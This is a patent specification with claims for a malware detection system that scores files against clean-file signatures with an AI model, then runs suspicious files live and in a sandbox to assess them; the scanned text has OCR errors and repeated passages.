The present invention relates to a malware automated response system. More specifically the a system that automatically detect the malicious file in real time.
BACKGROUND OF THE INVENTION
Malware, or malicious software are designed to infiltrate or damage a computer system. Examples of malware include computer viruses, worms, spyware, crimeware. Forms of attack can include attempts to read, alter, or destroy data or to compromise the computer's operating system to take control of the machine. The primary motivation for the development and use of malware is financial gain. In order to achieve the greatest impact, malware is typically created to target the devices and operating systems that have the greatest market share. If malware has root access on a mobile device chances are it has access to email, banking credentials, contacts, and even the user's physical location. Signature based anti-malware systems are essentially ineffective in detecting zero-day, or previously unknown, variants. Malware cannot be detected unless samples have already been obtained. Malware analysts are trained to follow a three-step technique, which includes surface analysis, runtime analysis, and static analysis. This process begins with the most straightforward and least resource-intensive analysis and progresses to techniques requiring the most time and skill. Anti-virus (AV) systems, such as endpoint protection platforms (EPPs), as well as breach detection services (BDS) employ virtual "sandboxes" or "honey nets" that operate in a cloud (virtual) network construct. These systems often fail to identify previously unknown malware due to the evolution within malware development that allows the malware to recognize when it is sitting in such a system/trap. Modern malware can be considered to be "cognitive" and completely aware that it is currently being incubated within a trap (monitored system).

implemented systems, non-transitory media, and methods are provided to identify risky network activities using intelligent algorithms. The appliances, systems, media, and methods enable rapid detection of risky activities.
WO2011084431A2 discloses a system for behavioral sandboxing. In one example embodiment, a system for behavioral sandboxing can include a network and a computer. The network communicatively coupled to a source of an executable application. The computer communicatively couple to the network and including a behavioral analysis module and a plurality of execution environments.
The existing inventions are less effective in preventing the cyber treath. The existing inventions are not cablable of accurately detect the malicious files in any software and server. The existing inventions are not cost-effective. Hence there is a need for the present invention to overcome the drawbacks of existing inventions.
OBJECTIVE OF THE INVENTION
The main objective of the present invention is that Malware automated response system provides real time malware detection.
Another objective of the present invention is to develop an easy and cost-effective way of removal of malwares from the data.
Yet another objective of the present invention is that data is cleaned in real time
environment.
Yet another objective of the present invention is that the present invention
provides scan time detection and run time detection.
Yet another objective of the present invention is that the present invention reduces
the time taken for decision making in malware automated response system with
the help of machine learning algorithm.

Further objectives, advantages, and features of the present invention will become apparent from the detailed description provided hereinbelow, in which various embodiments of the disclosed invention are illustrated by way of example.
SUMMARY OF THE PRESENT INVENTION
The present invention related to a malware automated response system. The present invention includes a monitoring system, a malware automated response web server, a malware automated response server one, a malware automated response server two, and a malware automated response server three. The monitoring system contains files that are being scanned for the threat detection. The files are fetched from monitoring system, and feed into the malware automated response web server. The malware automated response web server includes a database storage unit and a processing unit. The database storage unit stores files, a trained artificial intelligence model and computer-readable instructions. The processing unit executes computer-readable instructions. The malware automated response server one is connected to the processing unit of the malware automated response web server. The malware automated response server one scans the files that are incoming in the malware automated response server one to check for suspicious files having threat. The malware automated response server two is connected to the processing unit of the malware automated response web server, and a malware automated response server one. The malware automated response server one sends suspicious files to the malware automated response server two that takes suspicious files to next stage of filtration that analyzes the suspicious files while the suspicious files are executed in real time. The malware automated response server two reports defects that are detected during that execution of the file. The malware automated response server three is connected to the processing unit of the malware automated response web server and the malware automated response server two. The malware automated response server three is a virtual environment and the suspicious files are executed in the virtual environment to check the malicious behavior of the suspicious files and to protect the genuine files from getting damaged by these malwares. Herein,

malware automated response system, is able to scan all the files of data from the monitoring system, irrespective of the format of the file.
The advantage of the present invention is that the present invention is cost-effective.
Yet another advantage of the present invention is that the present invention provide real time malware detection.
Yet another advantage of the present invention is that in present invention data is
cleaned in real time environment.
Yet another advantage of the present invention is to reduce the time taken for
decision making in malware automated response system with the help of machine
learning algorithm.
Further objectives, advantages, and features of the present invention will become
apparent from the detailed description provided hereinbelow, in which various
embodiments of the disclosed invention are illustrated by way of example.
BRIEF DESCRIPTION OF THE DRAWINGS
The accompanying drawings are incorporated in and constitute a part of this specification to provide a further understanding of the invention. The drawings illustrate one embodiment of the invention and together with the description, serve to explain the principles of the invention. Fig. 1 illustrates a line diagram of the present invention.
DETAILED DESCRIPTION OF THE INVENTION
Definition
The term "a" or "an", as used herein, is defined as one. The term "plurality", as used herein, is defined as two as or more than one. The term "another", as used herein, is defined as at least a second or more. The terms "including" and/or "having", as used herein, are defined as comprising (i.e., open language).

The term "comprising" is not intended to limit the present invention with such terminology rather is used in a wider sense. Any invention using the term comprising could be separated into one or more claims using "consisting" or "consisting of. The term "comprising" may be used interchangeably with the terms "having" or "containing".
Reference in this document to "one embodiment", "certain embodiments", "an embodiment", "another embodiment", and "yet another embodiment" or similar terms, throughout the document means that a specific feature, structure, or characteristic described in connection with the embodiment is included in at least one embodiment of the present invention. Thus, the appearances of such phrases in various places, this specification throughout are not necessarily all referring to the same embodiment. Furthermore, the specific features, structures, or characteristics are combined in any suitable manner in one or more embodiments without limitation.
The term "or" as used herein is to be interpreted as inclusive or meaning any one or more combinations. Therefore, "A, B or C" means any of the following: "A; B; C; A and B; A and C; B and C; A, B and C". An exception to this definition will occur only when a combination of elements, functions, steps, or acts are in mutually exclusive, inherently.
As used herein, the term "one or more" generally refers to, but is not limited to, singular as well as the plural form of the term.
The drawings featured in the figures are to illustrate certain convenient embodiments of the present invention and are not to be considered as a limitation to that. Term "means" preceding a present participle of operation indicates the desired function for which there is one or more embodiments, i.e., one or more methods, for achieving the desired function and that one skilled in the art could select from these or their equivalent in view of the disclosure herein and use of the term "means" is not intended to be limiting.

Fig. 1 illustrates a line diagram of a malware automated response system(lOO). The malware automated response system(lOO) includes a monitoring system(102), a malware automated response web server(104), a malware automated response server one(llO), a malware automated response server two(112), and a malware automated response server three(114). The malware automated response web server(104) includes a database storage unit(106) and a processing unit(108). The malware automated response server one(llO) is connected to the processing unit(108) of the malware automated response web server(104). The malware automated response server two(112) is connected to the processing unit(108) of the malware automated response web server(104), and a malware automated response server one(llO). The malware automated response server three(114) is connected to the processing unit(108) of the malware automated response web server(104) and the malware automated response server two(l 12). The present invention related to a malware automated response system. The present invention includes a monitoring system, a malware automated response web server, a malware automated response server one, a malware automated response server two, and a malware automated response server three. The monitoring system contains files that are being scanned for the threat detection. In an embodiment, the the monitoring system includes, but not limited to, from a desktop computer, a laptop, a tablet, a smartphone, a mobile phone. The files are fetched from monitoring system, and feed into the malware automated response web server. In an embodiment, the malware automated response web server includes, but not limited to, a PHP Powered Web GUI. The malware automated response web server includes a database storage unit and a processing unit. The database storage unit stores files, a trained artificial intelligence model and computer-readable instructions. The processing unit executes computer-readable instructions. The malware automated response server one is connected to the processing unit of the malware automated response web server. The malware automated response server one scans the files that are incoming in the malware automated response server one to check for suspicious files having threat. In an embodiment, the malware automated response server one scans the different types

data that includes, but not limited to, text, numeric, multimedia, models, audio, code, software, video, and instrument, application. The malware automated response server two is connected to the processing unit of the malware automated response web server, and a malware automated response server one. The malware automated response server one sends suspicious files to the malware automated response server two that takes suspicious files to next stage of filtration that analyzes the suspicious files while the suspicious files are executed in real time. The malware automated response server two reports defects that are detected during that execution of the file. The malware automated response server three is connected to the processing unit of the malware automated response web server and the malware automated response server two. The malware automated response server three is a virtual environment and the suspicious files are executed in the virtual environment to check the malicious behavior of the suspicious files and to protect the genuine files from getting damaged by these malwares. Herein, malware automated response system, is able to scan all the files of data from the monitoring system, irrespective of the format of the file. In an embodiment, the virtual environment in malware automated response server three includes, but not limited to, a Kaspersky Total Security, Bitdefender Antivirus Plus, Norton 3 Deluxe, Trend Micro Maximum Security, Avast, Comodo. The present invention related to a malware automated response system. The present invention includes one or more monitoring systems, a malware automated response web server, a malware automated response server one, a malware automated response server two, and a malware automated response server three. The one or more monitoring systems contain files that are being scanned for the threat detection. In an embodiment, the one or more monitoring systems include, but not limited to, desktop computer, a laptop, a tablet, a smartphone, a mobile phone. The files are fetched from the one or more monitoring systems, and feed into the malware automated response web server. In an embodiment, the malware automated response web server includes, but not limited to, a PHP Powered Web GUI. The malware automated response web server includes a database storage unit and a processing unit. The database storage unit stores files, a trained

artificial intelligence model and computer-readable instructions. The processing unit executes computer-readable instructions. The malware automated response server one is connected to the processing unit of the malware automated response web server. The malware automated response server one scans the files that are incoming in the malware automated response server one to check for suspicious files having threat. In an embodiment, the malware automated response server one scans the different types data that includes, but not limited to, text, numeric, multimedia, models, audio, code, software, video, and instrument, application. The malware automated response server two is connected to the processing unit of the malware automated response web server, and a malware automated response server one. The malware automated response server one sends suspicious files to the malware automated response server two that takes suspicious files to next stage of filtration that analyzes the suspicious files while the suspicious files are executed in real time. The malware automated response server two reports defects that are detected during that execution of the file. The malware automated response server three is connected to the processing unit of the malware automated response web server and the malware automated response server two. The malware automated response server three is a virtual environment and the suspicious files are executed in the virtual environment to check the malicious behavior of the suspicious files and to protect the genuine files from getting damaged by these malwares. Herein, malware automated response system, is able to scan all the files of data from the one or more monitoring systems, irrespective of the format of the file. In an embodiment, the virtual environment in malware automated response server three includes, but not limited to, a Kaspersky Total Security, Bitdefender Antivirus Plus, Norton 36 Deluxe, Trend Micro Maximum Security, Avast, Comodo.
In an embodiment the present invention a method for malware automated response, the method includes
A method to check the file format and nature of the file with the help of malware automated response web server, the method having

one or more monitoring systems communicate with the malware
automated response web server; and
the processing unit executes computer-readable instructions to check
file format, the one or more monitoring systems to fetch the file and then
send the file to malware automated response server one for scanning.
A method for automated scanning of malicious nature of files, the
method having
a malware automated response server one, malware automated response server one uses artificial intelligence model to scans the signature of the files and once the scanning is complete, the artificial intelligence model compares signature of the file with the signature of original file that is being stored in the one or more monitoring systems; and based on the comparison the artificial intelligence model gives a score to the file, in case score is low the file is considered suspicious file. Herein, in order to give score to the file the malware automated response server one also scans key phrases, source code, structures, signatures of the file.
A method to check the runtime error detection of the files from the database storage unit, the method having
a malware automated response server two executes the suspicious file in
real environment, and detect the error during the execution of the
suspicious file;
the malware automated response server one, collects the data of and
detected the errors in the suspicious file;
malware automated response server one, analysis the data of and detected
the errors;
thus malware automated response server two verify the type of malicious
content in the suspicious file;
thus the suspicious file is confirmed as malicious file since errors are
detected while execution of the suspicious file; and

a malware automated response server two sends the malicious file to a malware automated response server three. A method to check severity of malicious files, the method having
the malware automated response server three works as isolated virtual server environment that provides hypothetical test environment for deployment of malicious files;
malicious files are run on isolated virtual server environment to find severity of the malicious file;
the malware automated response server three analyze the behaviors and working of the malicious file; and
the malware automated response server three records the analysis of the behavior and working of the malicious file in a database storage unit of the malware automated response web server.
In an embodiment, the artificial intelligence model is trained for scoring the files
to identify suspicious file, the method of training the artificial intelligence model
comprises:
all original cleans files of the one or more monitoring systems have unique
signatures,
a processing unit of the malware automated response web server creates database
of all original cleans file signatures;
processing unit of the malware automated response web server feeds the database
of all original cleans file signatures into the untrained artificial intelligence model
thus training the untrained artificial intelligence model to distinguish between
original cleans file signatures and suspicious file;
the artificial intelligence model reads all original cleans file signatures and
developed neural network model that is a trained artificial intelligence model that
distinguishes between original cleans file signatures and suspicious file;
the trained artificial intelligence model calculate the probability of similarity
between signatures original cleans file and signature of suspicious file;

high probability of similarity is scored high and low probability of similarity is scored low, thus the file with low score is term as suspicious files; the trained artificial intelligence model is stored in a database storage unit of the malware automated response web server.
In an embodiment, key phrases, source code, structures, signatures of the original cleans file is also used to train the untrained artificial intelligence model.
Further objectives, advantages, and features of the present invention will become apparent from the detailed description provided herein, in which various embodiments of the disclosed present invention are illustrated by way of example and appropriate reference to accompanying drawings. Those skilled in the art to which the present invention pertains may make modifications resulting in other embodiments employing principles of the present invention without departing from its spirit or characteristics, particularly upon considering the foregoing teachings. Accordingly, the described embodiments are to be considered in all respects only as illustrative, and not restrictive, and the scope of the present invention is, therefore, indicated by the appended claims rather than by the foregoing description or drawings. Consequently, while the present invention has been described with reference to particular embodiments, modifications of structure, sequence, materials and the like apparent to those skilled in the art still fall within the scope of the invention as claimed by the applicant.

I/WE CLAIMS

1. A malware automated response system(lOO), the system comprising;
a monitoring system(102), the monitoring system(102) contains files that
are being scanned for the threat detection;
a malware automated response web server(104), the files are fetched from monitoring system(102), and feed into the malware automated response web server(104), the malware automated response web server(104), having;
a database storage unit(106), the database storage unit(106) stores
files, a trained artificial intelligence model and computer-readable
instructions, and
a processing unit(108), the processing unit(108) executes
computer-readable instructions; a malware automated response server one(llO), the malware automated response server one(llO) is connected to the processing unit(108) of the malware automated response web server(104), the malware automated response server one(llO) scans the files that are incoming in the malware automated response server one(llO) to check for files suspicious having threat;
a malware automated response server two(112), the malware automated response server two(112) is connected to the processing unit(108) of the malware automated response web server(104), and a malware automated response server one(llO), the malware automated response server one(llO) sends suspicious files to the malware automated response server two(112) that takes suspicious files to next stage of filtration that analyzes the suspicious files while the suspicious files are executed in real time and the malware automated response server two(112) reports defects that are detected during that execution of the file;
a malware automated response server three(114), the malware automated response server three(114) is connected to the processing unit(108) of the

malware automated response web server(104) and the malware automated response server two(112), the malware automated response server three(l 14) is a virtual environment and the suspicious files are executed in the virtual environment to check the malicious behavior of the suspicious files and to protect the genuine files from getting damaged by these malwares;
wherein, malware automated response system(lOO), is able to scan all the files of data from the monitoring system(102), irrespective of the format of the file.
2. The at least one the monitoring system(102) as claimed in claim 1, wherein at least one the monitoring system(102) is selected from a desktop computer, a laptop, a tablet, a smartphone, a mobile phone.
3. The malware automated response web server(104), as claimed in claim 1, wherein the malware automated response web server(104) is selected from a PHP Powered Web GUI.
4. The malware automated response server one(llO), as claimed in claim 1, the malware automated response server one(llO) scans the data, data can be in form of text, numeric, multimedia, models, audio, code, software, video, and instrument, application.
5. The malware automated response server three(114) as claimed in claim 1, the virtual environment in malware automated response server three(114) is selected from a Kaspersky Total Security, Bitdefender Antivirus Plus, Norton 360 Deluxe, Trend Micro Maximum Security, Avast, Comodo.
6. The system as claimed, herein, a method for malware automated response system(lOO), the method includes
a method to check the file format and nature of the file with the help of malware automated response web server(104), the method having
a monitoring system(102) communicates with the malware automated
response web server(104),
the processing unit(108) executes computer-readable instructions to check

file format, monitoring system(102) to fetch the file and then send the file to malware automated response server one(l 10) for scanning;
a method for automated scanning of malicious nature of files, the
method having
a malware automated response server one(llO), malware automated response server one(llO) uses artificial intelligence model to scans the signature of the files and once the scanning is complete, the artificial intelligence model compares signature of the file with the signature of original file that is being stored in monitoring system(102), based on the comparison the artificial intelligence model gives a score to the file, in case score is low the file is considered suspicious file;
wherein, in order to give score to the file the malware automated response server
one(llO) also scans key phrases, source code, structures, signatures of the file;
a method to check the runtime error detection of the files from the database storage unit(106), the method having
a malware automated response server two(l 12) executes the suspicious file
in real environment, and detect the error during the execution of the
suspicious file,
the malware automated response server one(llO), collects the data of and
detected the errors in the suspicious file,
malware automated response server one(llO), analysis the data of and
detected the errors,
thus malware automated response server two(112) verify the type of
malicious content in the suspicious file,
thus the suspicious file is confirmed as malicious file since errors are
detected while execution of the suspicious file, and
a malware automated response server two(112) sends the malicious file to
a malware automated response server three(l 14); a method to check severity of malicious files, the method having

the malware automated response server three(114) works as isolated virtual server environment that provides hypothetical test environment for deployment of malicious files,
malicious files are run on isolated virtual server environment to find severity of the malicious file,
the malware automated response server three(114) analyze the behaviors and working of the malicious file,
the malware automated response server three(114) records the analysis of the behavior and working of the malicious file in a database storage unit(106) of the malware automated response web server(104).
7. The artificial intelligence model as claimed in claim 6, wherein the artificial
intelligence model is trained for scoring the files to identify suspicious file, the
method of training the artificial intelligence model comprises:
all original cleans files of the monitoring system(102) have unique signatures,
a processing unit(108) of the malware automated response web server(104)
creates database of all original cleans file signatures;
processing unit(108) of the malware automated response web server(104) feeds
the database of all original cleans file signatures into the untrained artificial
intelligence model thus training the untrained artificial intelligence model to
distinguish between original cleans file signatures and suspicious file;
the artificial intelligence model reads all original cleans file signatures and
developed neural network model that is a trained artificial intelligence model that
distinguishes between original cleans file signatures and suspicious file;
the trained artificial intelligence model calculate the probability of similarity
between signatures original cleans file and signature of suspicious file;
high probability of similarity is scored high and low probability of similarity is
scored low, thus the file with low score is term as suspicious files;
the trained artificial intelligence model is stored in a database storage unit(106) of the malware automated response web server(104).

8. The method as claimed in claim 7, wherein, key phrases, source code, structures, signatures of the original cleans file is also used to train the untrained artificial intelligence model.